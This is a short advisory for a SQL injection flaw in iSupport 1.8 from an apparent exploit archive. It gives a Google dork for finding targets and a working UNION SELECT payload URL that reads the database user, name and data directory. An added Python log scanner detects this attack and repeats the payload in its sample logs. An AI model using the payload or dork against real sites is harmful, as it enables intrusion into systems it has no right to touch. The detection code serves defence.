iSupport 1.8 SQL Injection Vulnerability



EKU-ID: 605 CVE: OSVDB-ID:
Author: Brendan Coles Published: 2011-06-24 Verified: Verified

# Date: 2011-06-23
# Author: Brendan Coles <bcoles@gmail.com>
# Advisory: http://itsecuritysolutions.org/2011-06-23-iSupport-1.8-SQL-Injection-Vulnerability/

# Software: iSupport
# Version: <= 1.8
# Homepage: http://www.idevspot.com/iSupport.php
# Google Dork: "Powered by [ iSupport 1.8 ]"

# Vendor: idevSpot
# Homepage: http://www.idevspot.com/
# Notified: Unnotified

# SQL Injection:

http://localhost/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=null union select null,concat(user(),0x3a,database(),0x3a,@@datadir),null,null,null,null--
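
A defensive check for the parameter above, as an added example that is not part of the original advisory: it scans web server access log lines for `x_category` values that carry SQL tokens or are not plain numeric IDs. The log lines, the `/support/` path and the assumption that legitimate category IDs are numeric are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption (not stated in the advisory): valid x_category values are numeric IDs.
NUMERIC_ID = re.compile(r"\d+")
# SQL tokens looked for after URL-decoding the parameter value.
SQL_TOKENS = re.compile(
    r"\bunion\b.*\bselect\b|--|/\*|@@|\bconcat\s*\(|\b0x[0-9a-f]+", re.I | re.S)
# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return (verdict, decoded_value) for a suspicious x_category, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/index.php"):
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get("x_category", []):
        if SQL_TOKENS.search(value):
            return ("sqli", value)
        if not NUMERIC_ID.fullmatch(value):
            return ("non-numeric", value)
    return None

def scan(lines):
    """Return [(line_index, verdict, decoded_value)] for every flagged line."""
    hits = []
    for i, line in enumerate(lines):
        result = classify(line)
        if result:
            hits.append((i, *result))
    return hits

# Constructed sample log lines (addresses, path and timestamps are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jun/2011:10:00:01 +0000] "GET /support/index.php'
    '?include_file=knowledgebase_list.php&x_category=3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [24/Jun/2011:10:02:13 +0000] "GET /support/index.php'
    '?include_file=knowledgebase_list.php&x_category=null%20union%20select'
    '%20null,concat(user(),0x3a,database()),null-- HTTP/1.1" 200 6011',
    '192.0.2.10 - - [24/Jun/2011:10:03:40 +0000] "GET /support/index.php'
    '?include_file=knowledgebase_list.php&x_category=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```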